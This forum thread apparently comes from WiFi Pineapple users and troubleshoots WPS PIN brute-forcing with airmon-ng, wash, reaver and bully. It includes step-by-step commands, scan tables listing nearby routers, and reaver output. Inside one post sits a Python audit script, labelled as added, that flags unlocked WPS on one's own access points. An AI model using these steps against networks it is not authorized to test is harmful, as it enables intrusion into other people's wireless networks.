SlimPickens
Active Members, 8 posts

  1. If I'm not using the interface, I'd put it down until you're 100% comfortable with what each interface is doing.
  2. You want the interface you are using to crack to be down. "Down" in ifconfig does not mean the hardware is disabled. The hardware is still there as wlan2, it's just not running as an interface for that part of the OS. The reason you do this is so that no other part of the OS is trying to use it while you are using it for cracking. That's why airmon-ng warns you about all those PIDs: one of them could interrupt your cracking by changing the settings or conditions of the hardware behind reaver. So if you want to use wlan2 for cracking, you want to:

         ifconfig wlan2 down
         airmon-ng start wlan2      (look for what mon interface number to use in the response)
         reaver -i *that_mon_interface_from_airmon-ng's_return* -b *mac* -vv -c *channel*

     But I'd start with wlan1, make sure that you have the hang of things, then move on to other hardware. You can check your work by running just ifconfig and looking at the interfaces.

         root@Pineapple:~# ifconfig
         br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   inet addr:172.16.42.1  Bcast:172.16.42.255  Mask:255.255.255.0
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1127 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24175 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:86006 (83.9 KiB)  TX bytes:1082632 (1.0 MiB)

         eth0      Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1130 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24178 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:102810 (100.4 KiB)  TX bytes:1083838 (1.0 MiB)
                   Interrupt:4

         lo        Link encap:Local Loopback
                   inet addr:127.0.0.1  Mask:255.0.0.0
                   UP LOOPBACK RUNNING  MTU:16436  Metric:1
                   RX packets:32058 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:32058 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:2481231 (2.3 MiB)  TX bytes:2481231 (2.3 MiB)

         wlan1     Link encap:Ethernet  HWaddr 00:13:37:93:58:09
                   UP BROADCAST MULTICAST  MTU:1500  Metric:1
                   RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

     See wlan1 is listed? Note the MAC address: 00:13:37:93:58:09. Now after ifconfig wlan1 down:

         root@Pineapple:~# ifconfig wlan1 down
         root@Pineapple:~# ifconfig
         br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   inet addr:172.16.42.1  Bcast:172.16.42.255  Mask:255.255.255.0
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1191 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24254 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:90726 (88.5 KiB)  TX bytes:1089990 (1.0 MiB)

         eth0      Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1194 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24257 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:108426 (105.8 KiB)  TX bytes:1091196 (1.0 MiB)
                   Interrupt:4

         lo        Link encap:Local Loopback
                   inet addr:127.0.0.1  Mask:255.0.0.0
                   UP LOOPBACK RUNNING  MTU:16436  Metric:1
                   RX packets:32114 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:32114 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:2485571 (2.3 MiB)  TX bytes:2485571 (2.3 MiB)

     Now here is what it looks like after running airmon-ng start wlan1:

         root@Pineapple:~# airmon-ng start wlan1

         Interface       Chipset         Driver

         wlan1           RTL8187         rtl8187 - [phy1]
                                         (monitor mode enabled on mon0)
         wlan0           Atheros         ath9k - [phy0]

         root@Pineapple:~#

     Note the "(monitor mode enabled on mon0)" and also notice that wlan0 wasn't in any of the ifconfigs but it is still in here (but we are ignoring it because wlan1/mon0 is what we're after). Now ifconfig again:

         root@Pineapple:~# ifconfig
         br-lan    Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   inet addr:172.16.42.1  Bcast:172.16.42.255  Mask:255.255.255.0
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1272 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24378 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:96714 (94.4 KiB)  TX bytes:1099694 (1.0 MiB)

         eth0      Link encap:Ethernet  HWaddr 00:13:37:A5:1E:DB
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:1275 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:24381 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:115548 (112.8 KiB)  TX bytes:1100900 (1.0 MiB)
                   Interrupt:4

         lo        Link encap:Local Loopback
                   inet addr:127.0.0.1  Mask:255.0.0.0
                   UP LOOPBACK RUNNING  MTU:16436  Metric:1
                   RX packets:32224 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:32224 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:0
                   RX bytes:2494087 (2.3 MiB)  TX bytes:2494087 (2.3 MiB)

         mon0      Link encap:UNSPEC  HWaddr 00-13-37-93-58-09-00-48-00-00-00-00-00-00-00-00
                   UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
                   RX packets:0 errors:0 dropped:0 overruns:0 frame:0
                   TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
                   collisions:0 txqueuelen:1000
                   RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

         root@Pineapple:~#

     We now have mon0. See the MAC address embedded in the HWaddr?
  3. I think that's what I would get if the wlan0 AP interface was on the same channel as my target. Or maybe it was what I would get if I used wlan0 for the mon interface. Remember you want to use airmon-ng start wlan1 then use the mon interface it reports; if it reports more than one, use airmon-ng stop monX like:

         airmon-ng stop mon0

     until it reports only:

         Interface       Chipset         Driver

         wlan1           RTL8187         rtl8187 - [phy1]
         wlan0           Atheros         ath9k - [phy0]

     Then airmon-ng start wlan1, and use mon0 for all "-i" with wash, reaver, and bully. What's the signal strength reported by wash and what channel are wlan0 and your target on? Be sure that there aren't any more powerful APs on the same channel. When my main network AP is on channel 6, I have to switch it to something else before I can target any further away APs on that channel. Also there are cases that APs reported by wash just won't be attackable. But before you give up give bully a try.
  4. It's always better to know the longhand first. You can work up from there no matter where you find yourself. ;) The only bad thing about that creed is there is always more longhand to learn. But man it is fun.
  5. The biggest help was starting at the command line. The trick is to make sure you're using wlan1 as your mon interface to start off with. I also primarily use the ethernet port to connect to it while it's nearby. Make sure that wlan0 (default Mk.V AP interface) isn't on the same channel as the target (change it if it is) or do like me and ifconfig it down if you're not using it. You won't have any luck with any remote AP on the same channel as wlan0 is on. I plan on adding a 5GHz AP-capable USB stick in the near future so there is no more interference (or get my LTE stick working).

     Command line steps (from a fresh boot up):

     1. Down the wlan1 interface:

            ifconfig wlan1 down

        Return: Nothing

     2. Start the mon interface:

            airmon-ng start wlan1

            root@Pineapple:~# airmon-ng start wlan1

            Interface       Chipset         Driver

            wlan1           RTL8187         rtl8187 - [phy1]
                                            (monitor mode enabled on mon0)
            wlan0           Atheros         ath9k - [phy0]

            root@Pineapple:~#

        (If there is anything else than the above, everything you do afterwards will be flaky as all get out)

     3. Look for your target router:

            wash -i mon0 -C

        I had to use -C or I'd just get bad FCS warnings and nothing else. The mon you should use is the one returned in the parentheses in the previous step, "(monitor mode enabled on mon0)".

            root@Pineapple:~# wash -i mon0 -C

            Wash v1.4 WiFi Protected Setup Scan Tool
            Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

            BSSID               Channel  RSSI  WPS Version  WPS Locked  ESSID
            --------------------------------------------------------------------------------------
            28:C6:8E:8C:90:F6   1        -73   1.0          No          #######
            E0:91:F5:75:CA:E2   1        -37   1.0          Yes         #######
            C0:C1:C0:BA:37:5F   1        -62   1.0          No          #######
            7C:05:07:62:7C:C3   1        -68   1.0          No          #######
            C0:C1:C0:8F:E0:91   1        -66   1.0          No          #######
            C0:C1:C0:CC:B1:43   1        -57   1.0          No          #######
            00:1C:DF:BE:43:47   6        -74   1.0          No          #######
            00:1F:33:2E:D5:DE   9        -68   1.0          No          #######
            A0:21:B7:80:22:22   9        -71   1.0          No          #######
            7C:05:07:29:EF:E7   11       -61   1.0          No          #######
            00:22:75:D2:5C:7E   11       -67   1.0          No          #######
            48:F8:B3:A3:15:31   11       -67   1.0          No          #######
            CC:B2:55:3C:F3:9C   11       -71   1.0          No          #######
            0C:54:A5:54:84:6B   1        -71   1.0          No          #######
            ^C
            root@Pineapple:~#

        (my router is the one with the WPS Locked. I also put the ####### in there) Anything with a -65 or lower is going to be hard to crack with lots of timeouts (remember these are negative numbers so -71 is lower than -65). The tiny included antennas are good for about 20-35 meters line of sight tops.

     4. Get the MAC address you want and start reaver:

            reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 1

        (-c is for channel, otherwise reaver (and bully) have to scan through each channel before starting. I'm impatient so I give it the clue)

            root@Pineapple:~# reaver -i mon0 -vv -b E0:91:F5:75:CA:E2 -c 11

            Reaver v1.4 WiFi Protected Setup Attack Tool
            Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

            [+] Switching mon0 to channel 11
            [?] Restore previous session for E0:91:F5:75:CA:E2? [n/Y]
            [+] Restored previous session
            [+] Waiting for beacon from E0:91:F5:75:CA:E2
            [+] Associated with E0:91:F5:75:CA:E2 (ESSID: #######)
            [+] Trying pin 33755670
            [+] Sending EAPOL START request
            [+] Received identity request
            [+] Sending identity response
            [+] Received M1 message
            [+] Sending M2 message
            [+] Received M3 message
            [+] Sending M4 message
            [+] Received WSC NACK
            [+] Sending WSC NACK
            [+] Trying pin 33765679
            [+] Sending EAPOL START request
            [+] Received identity request
            [+] Sending identity response
            [+] Received M1 message
            [+] Sending M2 message
            [+] Received M3 message
            [+] Sending M4 message
            [+] Received WSC NACK
            [+] Sending WSC NACK
            [+] Trying pin 33775678
            [+] Sending EAPOL START request
            [+] Received identity request
            [+] Sending identity response
            [+] Received M1 message
            ^C
            [+] Session saved.
            root@Pineapple:~#

     4b. Or bully:

            bully -b E0:91:F5:75:CA:E2 -c 1 -S mon0

     5. Is up to you. You can do the same thing on the web interface. Just disable the wlan1 interface, enable monitor mode on wlan1, then use the infusion. Or continue to use the command line with "screen" to allow you to disconnect without quitting reaver.
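Added example, not code from this thread: an audit helper for the owner of the APs in a wash scan. It parses the wash table format shown in the post above and reports which of your own BSSIDs still advertise WPS without having tripped the PIN lockout, using the poster's -65 dBm rule of thumb for a usable signal. The sample text is constructed from rows of that table (ESSIDs masked as in the post); the fix for anything it flags is to disable WPS on that AP or confirm its lockout works.

```python
"""Parse `wash -i mon0 -C` output and flag APs that still expose unlocked WPS (audit use)."""
import re
from dataclasses import dataclass

# Constructed sample (rows taken from the wash table in the post, banner as printed by wash 1.4).
SAMPLE_WASH_OUTPUT = """\
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel  RSSI  WPS Version  WPS Locked  ESSID
--------------------------------------------------------------------------------------
28:C6:8E:8C:90:F6       1       -73   1.0          No          #######
E0:91:F5:75:CA:E2       1       -37   1.0          Yes         #######
C0:C1:C0:CC:B1:43       1       -57   1.0          No          #######
00:1C:DF:BE:43:47       6       -74   1.0          No          #######
^C
"""

# One wash data row: BSSID, channel, RSSI (dBm, negative), WPS version, locked flag, ESSID.
ROW_RE = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<channel>\d+)\s+(?P<rssi>-?\d+)\s+(?P<version>\d+\.\d+)\s+"
    r"(?P<locked>Yes|No)\s+(?P<essid>.*?)\s*$"
)


@dataclass(frozen=True)
class WpsAp:
    bssid: str
    channel: int
    rssi: int
    version: str
    locked: bool
    essid: str


def parse_wash(text: str) -> list[WpsAp]:
    """Return one WpsAp per data row; banner, header, separator and ^C lines do not match."""
    aps = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            aps.append(WpsAp(m["bssid"].upper(), int(m["channel"]), int(m["rssi"]),
                             m["version"], m["locked"] == "Yes", m["essid"]))
    return aps


def exposed_aps(aps: list[WpsAp], min_rssi: int = -65) -> list[WpsAp]:
    """APs advertising WPS that are not locked and are heard above min_rssi, strongest first.

    A 'Yes' in WPS Locked means the AP has already engaged its PIN lockout; the poster's rule
    is that anything at -65 dBm or lower is too weak to matter, so those are left out too."""
    return sorted((a for a in aps if not a.locked and a.rssi > min_rssi), key=lambda a: -a.rssi)
```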
  6. I have an RTL2870 based USB stick (works in Kali) and an RTL8188CUS based USB stick (not tried in Kali). I have yet to get any of them to show up beyond an entry in lsusb until I get done with playing on the internal hardware. Also have a Pantech UML290 USB 4G modem that I know took some real fandangling to get working with my BeagleBoard xM that is waiting for its chance at ifup. That will eventually be my "way in". Thanks for the help everyone!
  7. Yep seems to work with wlan1 (as long as the AP/router isn't set to N only it seems). I guess my dreams of doing 2 at once (or doubling up on 1) are up in smoke.
  8. Just got my Pineapple, updated to 1.3 and installed a few infusions (including WPS). I've been having trouble within the WPS GUI (waits for beacons forever) so I dropped to console to start eliminating possibles and my trouble seems to be with something other than the GUI. I have a wifi router set up as my target with WPS enabled. First I down the interface (never works with it up and even through the GUI I have to manually down it). After I start with airmon-ng:

         airmon-ng start wlan0

         Found 1 processes that could cause trouble.
         If airodump-ng, aireplay-ng or airtun-ng stops working after
         a short period of time, you may want to kill (some of) them!

         PID     Name
         2936    root
         Process with PID root (  PID USER       VSZ STAT COMMAND
             1 root      1524 S    init
             2 root         0 SW   [kthreadd]
             3 root         0 SW   [ksoftirqd/0]
             5 root         0 SW   [kworker/u:0]
             6 root         0 SW<  [khelper]
            61 root         0 SW   [sync_supers]
            63 root         0 SW   [bdi-default]
            65 root         0 SW<  [kblockd]
            94 root         0 SW   [kswapd0]
           143 root         0 SW   [fsnotify_mark]
           155 root         0 SW<  [ath79-spi]
           166 root         0 SW   [mtdblock0]
           171 root         0 SW   [mtdblock1]
           176 root         0 SW   [mtdblock2]
           181 root         0 SW   [mtdblock3]
           186 root         0 SW   [mtdblock4]
           191 root         0 SW   [mtdblock5]
           232 root         0 SW   [kworker/0:1]
           422 root         0 SWN  [jffs2_gcd_mtd3]
           424 root         0 SW   [flush-mtd-unmap]
           448 root         0 SW   [khubd]
           459 root         0 SW   [scsi_eh_0]
           460 root         0 SW   [usb-storage]
           461 root         0 SW   [kworker/0:2]
           462 root         0 SW   [kworker/u:2]
           481 root      1524 S    init
           516 root         0 SW<  [cfg80211]
           558 root         0 SW<  [rpciod]
           568 root         0 SW<  [nfsiod]
           660 root      1528 S    /sbin/syslogd -C16
           662 root      1512 S    /sbin/klogd
           664 root       860 S    /sbin/hotplug2 --override --persistent --set-rules-f
           676 root       876 S    /sbin/ubusd
           745 root      1856 S    {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke
           860 root      1488 S    /sbin/netifd
          1269 root         0 SW   [jbd2/sda1-8]
          1270 root         0 SW<  [ext4-dio-unwrit]
          1376 root      1520 S    /sbin/watchdog -t 5 /dev/watchdog
          1549 root         0 SW   [flush-8:0]
          1634 nobody     788 S    /usr/sbin/atd
          1642 root      1536 S    /usr/sbin/crond -c /etc/crontabs -l 5
          1648 root      2864 S    /usr/sbin/sshd
          1671 root      1136 S    /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin
          1677 root      1160 S    /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e
          1715 nobody     956 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
          1731 root      1520 S    /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope
          2936 root      1624 S    wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80
          2963 root      1528 S    udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d
          3647 root      5488 S    {sshd} sshd: root@pts/0
          3660 root      1524 S    -ash
          3692 root      1508 S    sleep 10
          3702 root      1540 S    {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0
          3703 root         0 SW   [kworker/u:1]
          3743 root      1516 R    ps -o comm= -p root) is running on interface wlan1
         Process with PID root (  PID USER       VSZ STAT COMMAND
             1 root      1524 S    init
             2 root         0 SW   [kthreadd]
             3 root         0 SW   [ksoftirqd/0]
             5 root         0 SW   [kworker/u:0]
             6 root         0 SW<  [khelper]
            61 root         0 SW   [sync_supers]
            63 root         0 SW   [bdi-default]
            65 root         0 SW<  [kblockd]
            94 root         0 SW   [kswapd0]
           143 root         0 SW   [fsnotify_mark]
           155 root         0 SW<  [ath79-spi]
           166 root         0 SW   [mtdblock0]
           171 root         0 SW   [mtdblock1]
           176 root         0 SW   [mtdblock2]
           181 root         0 SW   [mtdblock3]
           186 root         0 SW   [mtdblock4]
           191 root         0 SW   [mtdblock5]
           232 root         0 SW   [kworker/0:1]
           422 root         0 SWN  [jffs2_gcd_mtd3]
           424 root         0 SW   [flush-mtd-unmap]
           448 root         0 SW   [khubd]
           459 root         0 SW   [scsi_eh_0]
           460 root         0 SW   [usb-storage]
           461 root         0 SW   [kworker/0:2]
           462 root         0 SW   [kworker/u:2]
           481 root      1524 S    init
           516 root         0 SW<  [cfg80211]
           558 root         0 SW<  [rpciod]
           568 root         0 SW<  [nfsiod]
           660 root      1528 S    /sbin/syslogd -C16
           662 root      1512 S    /sbin/klogd
           664 root       860 S    /sbin/hotplug2 --override --persistent --set-rules-f
           676 root       876 S    /sbin/ubusd
           745 root      1856 S    {mobile-keepaliv} /bin/bash /etc/pineapple/mobile-ke
           860 root      1488 S    /sbin/netifd
          1269 root         0 SW   [jbd2/sda1-8]
          1270 root         0 SW<  [ext4-dio-unwrit]
          1376 root      1520 S    /sbin/watchdog -t 5 /dev/watchdog
          1549 root         0 SW   [flush-8:0]
          1634 nobody     788 S    /usr/sbin/atd
          1642 root      1536 S    /usr/sbin/crond -c /etc/crontabs -l 5
          1648 root      2864 S    /usr/sbin/sshd
          1671 root      1136 S    /usr/sbin/uhttpd -f -h /www -r Pineapple -x /cgi-bin
          1677 root      1160 S    /usr/sbin/uhttpd -f -h /pineapple -r Pineapple -c /e
          1715 nobody     956 S    /usr/sbin/dnsmasq -C /var/etc/dnsmasq.conf
          1731 root      1520 S    /usr/sbin/ntpd -n -p 0.openwrt.pool.ntp.org -p 1.ope
          2936 root      1624 S    wpa_supplicant -B -P /var/run/wifi-wlan1.pid -D nl80
          2963 root      1528 S    udhcpc -p /var/run/udhcpc-wlan1.pid -s /lib/netifd/d
          3647 root      5488 S    {sshd} sshd: root@pts/0
          3660 root      1524 S    -ash
          3692 root      1508 S    sleep 10
          3702 root      1552 S    {airmon-ng} /bin/sh /usr/sbin/airmon-ng start wlan0
          3703 root         0 SW   [kworker/u:1]
          3744 root      1516 R    ps -o comm= -p root) is running on interface wlan1

         Interface       Chipset         Driver

         wlan1           RTL8187         rtl8187 - [phy1]
         wlan0           Atheros         ath9k - [phy0]
                                         (monitor mode enabled on mon0)

     Many other things seem to work on mon0. When I run reaver, it's failing badly:

         root@Pineapple:~# reaver -i mon0 -b C0:C1:C0:8F:E0:91 -c 6 -vv

         Reaver v1.4 WiFi Protected Setup Attack Tool
         Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

         [+] Switching mon0 to channel 6
         [+] Waiting for beacon from C0:C1:C0:8F:E0:91
         [+] Associated with C0:C1:C0:8F:E0:91 (ESSID: SPickens)
         [+] Trying pin 12345670
         [+] Sending EAPOL START request
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [!] WARNING: Receive timeout occurred
         [+] Sending WSC NACK
         [!] WPS transaction failed (code: 0x02), re-trying last pin
         [+] Trying pin 12345670
         [+] Sending EAPOL START request
         [+] Received identity request
         [+] Sending identity response
         [+] Received M1 message
         [+] Sending M2 message
         [+] Received M1 message
         [+] Sending WSC NACK
         [+] Sending WSC NACK
         [!] WPS transaction failed (code: 0x03), re-trying last pin
         [+] Trying pin 12345670
         [+] Sending EAPOL START request
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [!] WARNING: Receive timeout occurred
         [+] Sending WSC NACK
         [!] WPS transaction failed (code: 0x02), re-trying last pin
         [+] Trying pin 12345670
         [+] Sending EAPOL START request
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         [+] Received identity request
         [+] Sending identity response
         ^C
         [+] Nothing done, nothing to save.

     It will just do that forever if I'd let it. Sometimes, like 1 in 100, it will make it to M3/4 but still fails. The Pineapple and the target router are separated by about 18-20 feet. I have no trouble with brute forcing this router with a crummy USB wifi stick and Kali in a VMware session except the occasional dropping of the mon0 interface, but it shows no WPS transactions failing until it abruptly stops with the mon0 interface. I have yet to get a single successful WPS transaction... What am I missing?